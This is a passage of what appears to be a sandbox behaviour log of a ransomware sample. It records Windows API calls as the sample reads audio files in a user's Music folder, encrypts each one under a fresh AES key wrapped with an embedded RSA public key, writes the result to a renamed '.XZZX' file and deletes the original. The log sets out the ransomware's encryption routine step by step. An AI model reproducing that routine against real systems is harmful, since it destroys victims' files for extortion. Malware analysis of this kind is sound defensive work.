GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0117.506] CryptEncrypt (in: hKey=0x3a5850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0117.506] CryptEncrypt (in: hKey=0x3a5850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc5e60*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc5e60*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0117.506] WriteFile (in: hFile=0x53c, lpBuffer=0x3cc5e60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc5e60*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0117.506] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.507] WriteFile (in: hFile=0x53c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.507] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0117.507] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0117.507] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x550) returned 0x0 [0117.507] RegQueryValueExW (in: hKey=0x550, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x6d, lpcbData=0x420dfdc*=0x4) returned 0x0 [0117.508] RegCloseKey (hKey=0x550) returned 0x0 [0117.508] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x550) returned 0x0 [0117.508] RegSetValueExW (in: hKey=0x550, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x6e, cbData=0x4 | out: lpData=0x420dfec*=0x6e) returned 0x0 [0117.508] RegCloseKey (hKey=0x550) returned 0x0 [0117.508] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.508] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.509] CloseHandle (hObject=0x53c) returned 1 [0117.510] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0117.511] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0117.511] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BtnyH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btnyh.mp3")) returned 1 [0117.511] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BtnyH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btnyh.mp3")) returned 0 Thread: id = 374 os_tid = 0x8e0 [0117.521] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.521] lstrcpyW (in: lpString1=0x420f460, lpString2="bTxozG6jGL89 vQ7JVm.m4a" | out: lpString1="bTxozG6jGL89 vQ7JVm.m4a") returned="bTxozG6jGL89 vQ7JVm.m4a" [0117.521] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.521] SetErrorMode (uMode=0x1) returned 0x1 [0117.521] lstrcpyW (in: lpString1=0x420f860, lpString2="bTxozG6jGL89 vQ7JVm.m4a" | out: lpString1="bTxozG6jGL89 vQ7JVm.m4a") returned="bTxozG6jGL89 vQ7JVm.m4a" [0117.521] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x3c2dabb, Data2=0xc866, Data3=0x4ca7, Data4=([0]=0xbf, [1]=0x53, [2]=0xd, [3]=0x91, [4]=0xc2, [5]=0xbb, [6]=0x4a, [7]=0x3f))) returned 0x0 [0117.521] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\bTxozG6jGL89 vQ7JVm.m4a") returned 96 [0117.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0117.521] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BA853E823C01028A03C2DABB4021E6D2.XZZX") returned 110 [0117.521] StrStrW (lpFirst="bTxozG6jGL89 vQ7JVm.m4a", lpSrch="XZZX") returned 0x0 [0117.521] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\bTxozG6jGL89 vQ7JVm.m4a", dwFileAttributes=0x20) returned 1 [0117.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\bTxozG6jGL89 vQ7JVm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btxozg6jgl89 vq7jvm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0117.522] ReadFile (in: hFile=0x54c, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0x1003a, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x420e418*=0x1003a, lpOverlapped=0x0) returned 1 [0117.523] CloseHandle (hObject=0x54c) returned 1 [0117.523] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0117.523] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0117.523] SetErrorMode (uMode=0x1) returned 0x1 [0117.524] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0117.524] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc5ee8) returned 1 [0117.526] CryptGenKey (in: hProv=0x3cc5ee8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0117.622] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.623] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.623] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.623] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0117.623] CryptDestroyKey (hKey=0x3a5710) returned 1 [0117.623] CryptReleaseContext (hProv=0x3cc5ee8, dwFlags=0x0) returned 1 [0117.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BA853E823C01028A03C2DABB4021E6D2.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\ba853e823c01028a03c2dabb4021e6d2.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0117.624] WriteFile (in: hFile=0x54c, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0x1003a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x420e438*=0x1003a, lpOverlapped=0x0) returned 1 [0117.625] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1003a [0117.625] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.625] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1003f [0117.625] WriteFile (in: hFile=0x54c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2e, lpOverlapped=0x0) returned 1 [0117.625] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1006d [0117.625] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.625] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10072 [0117.625] SetErrorMode (uMode=0x1) returned 0x1 [0117.625] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0117.625] OutputDebugStringW (lpOutputString="end") [0117.625] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0117.625] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0117.625] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc5ee8) returned 1 [0117.626] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5ee8, dwCertEncodingType=0x1, pInfo=0x3cb0a68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0a98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0aa0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5890) returned 1 [0117.626] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.626] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0117.626] CryptEncrypt (in: hKey=0x3a5890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0117.626] CryptEncrypt (in: hKey=0x3a5890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc5f70*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc5f70*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0117.627] WriteFile (in: hFile=0x54c, lpBuffer=0x3cc5f70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc5f70*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0117.627] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.627] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.627] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0117.627] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0117.627] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x554) returned 0x0 [0117.627] RegQueryValueExW (in: hKey=0x554, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x6e, lpcbData=0x420dfdc*=0x4) returned 0x0 [0117.627] RegCloseKey (hKey=0x554) returned 0x0 [0117.627] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x554) returned 0x0 [0117.627] RegSetValueExW (in: hKey=0x554, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x6f, cbData=0x4 | out: lpData=0x420dfec*=0x6f) returned 0x0 [0117.627] RegCloseKey (hKey=0x554) returned 0x0 [0117.627] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.628] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.628] CloseHandle (hObject=0x54c) returned 1 [0117.629] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0117.630] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0117.630] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\bTxozG6jGL89 vQ7JVm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btxozg6jgl89 vq7jvm.m4a")) returned 1 [0117.630] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\bTxozG6jGL89 vQ7JVm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btxozg6jgl89 vq7jvm.m4a")) returned 0 Thread: id = 375 os_tid = 0x8e4 [0117.679] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.679] lstrcpyW (in: lpString1=0x420f460, lpString2="dTOAV.wav" | out: lpString1="dTOAV.wav") returned="dTOAV.wav" [0117.679] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.679] SetErrorMode (uMode=0x1) returned 0x1 [0117.679] lstrcpyW (in: lpString1=0x420f860, lpString2="dTOAV.wav" | out: lpString1="dTOAV.wav") returned="dTOAV.wav" [0117.679] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x3eaea727, Data2=0x2b1f, Data3=0x4c86, Data4=([0]=0x9d, [1]=0x1c, [2]=0x82, [3]=0xd7, [4]=0x5f, [5]=0xf1, [6]=0xfd, [7]=0x13))) returned 0x0 [0117.679] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\dTOAV.wav") returned 82 [0117.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0117.679] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned 110 [0117.680] StrStrW (lpFirst="dTOAV.wav", lpSrch="XZZX") returned 0x0 [0117.680] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\dTOAV.wav", dwFileAttributes=0x20) returned 1 [0117.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\dTOAV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dtoav.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0117.681] ReadFile (in: hFile=0x550, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0x17fb2, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x420e418*=0x17fb2, lpOverlapped=0x0) returned 1 [0117.684] CloseHandle (hObject=0x550) returned 1 [0117.684] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0117.685] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0117.685] SetErrorMode (uMode=0x1) returned 0x1 [0117.686] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0117.686] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc5ff8) returned 1 [0117.689] CryptGenKey (in: hProv=0x3cc5ff8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0117.873] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.873] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.873] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.874] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0117.874] CryptDestroyKey (hKey=0x3a5710) returned 1 [0117.874] CryptReleaseContext (hProv=0x3cc5ff8, dwFlags=0x0) returned 1 [0117.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\ed39cab90ce3c63a3eaea7271104aa82.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0117.875] WriteFile (in: hFile=0x558, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0x17fb2, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x420e438*=0x17fb2, lpOverlapped=0x0) returned 1 [0117.877] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17fb2 [0117.877] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.877] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17fb7 [0117.877] WriteFile (in: hFile=0x558, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x12, lpOverlapped=0x0) returned 1 [0117.877] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17fc9 [0117.877] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.877] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17fce [0117.877] SetErrorMode (uMode=0x1) returned 0x1 [0117.877] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0117.877] OutputDebugStringW (lpOutputString="end") [0117.878] CryptStringToBinaryA 